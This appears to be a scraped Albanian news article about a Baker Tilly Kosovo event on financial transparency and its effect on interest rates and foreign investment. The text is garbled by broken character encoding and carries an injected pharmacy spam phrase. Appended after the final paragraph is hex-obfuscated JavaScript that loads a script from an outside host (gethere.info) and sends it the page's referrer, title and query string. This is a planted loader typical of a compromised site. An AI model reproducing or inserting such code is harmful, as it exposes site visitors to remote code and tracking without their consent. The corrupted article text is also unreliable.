f.1121130806820_m

Transparenca financiare parakusht pA�r uljen e normave te interesit

los algodones pharmacies price list. Kompania konsulente Baker Tilly Kosovo, nA� bashkA�punim me OdA�n Ekonomike Amerikane tA� KosovA�s (OEAK) ftuan bizneset, bankat dhe institucionet publike pA�r tA� diskutuar mbi gjendjen e transparencA�s financiare nA� KosovA� dhe reflektimin e saj nA� normat e interesit dhe besimin tek investitorA�t e huaj.

Informacioni financiar i besueshA�m A�shtA� me rA�ndA�si fundamentale pA�r ta��u larguar nga modeli i kreditimit i bazuar nA� kolateral. NjA� pA�rmirA�sim i transparencA�s financiare do tA� na shpie drejt kreditimit sipas rrjedhA�s sA� parasA� apo vlerA�simit kreditor. NA�se informatat janA� tA� sakta atA�herA� institucionet financiare e kanA� tA� lehtA� tA� pA�rcaktojnA� aftA�sinA� e huamarrA�sit pA�r kreditim. CilA�sia e praktikave tA� kontabilitetit dhe auditimit nA� njA� ekonomi si Kosova A�shtA� e rA�ndA�sishme pA�r sektorin privat dhe atA� publik, sepse tA� dy luajnA� njA� rol tA� rA�ndA�sishA�m nA� shtytjen e rritjes ekonomike tA� vendit.

PA�r momentin, me pA�rjashtim tA� institucioneve financiare tA� qeverisura nga BQK-ja, pasqyrat financiare tA� tA� gjitha kompanive tA� KosovA�s, duke pA�rfshirA� NPP-tA� dhe NPSH-tA� (me pA�rjashtim tA� Aeroportit tA� PrishtinA�s dhe PostA�s dhe Telekomit tA� KosovA�s) nuk janA� nA� dispozicion tA� publikut. Kjo mungesA� e transparencA�s nuk nxit njA� mjedis biznesi tA� favorshA�m pA�r investimet e huaja direkte.

PjesA�marrA�sit e kA�tij takimi ftojnA� QeverinA� e KosovA�s qA� tA� ngrisA� kapacitetet e KA�shillit mbi Raportimin Financiar dhe Agjencionit pA�r Regjistrimin e Bizneseve pA�r tA� udhA�hequr infrastrukturA�n e raportimit financiar tA� nevojshme pA�r tA� pA�rkrahur investimet e huaja direkte. Institucionet do tA� duhej tA� investonin me shumA� resurse pA�r tA� pA�rmirA�suar dhe krijuar mundA�sitA� qA� KA�shilli tA� kryej detyrA�n siq i A�shtA� dhA�nA� me ligj mbi raportimin financiar dhe kontabilitetin, nA� mA�nyrA� qA� kjo ti kthehet me mA� shumA� investime tA� huaja dhe mA� shumA� financim pA�r ekonominA� e KosovA�s.

Kompania ndA�rkombA�tare e konsulencA�s Baker Tilly International ka pA�rfshirA� nA� kuadA�r tA� vet firmA�n Kosovare BU and Partners, e cila tani do tA� njihet si Baker Tilly Kosovo. Baker Tilly International A�shtA� prezente ne nA� 125 vende dhe ka 25 mijA� tA� punA�suar. PA�r nga qarkullimi Baker Tilly A�shtA� e ranguar si kompanie e tetA� nA� botA� pA�r nga qarkullimi vjetor.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}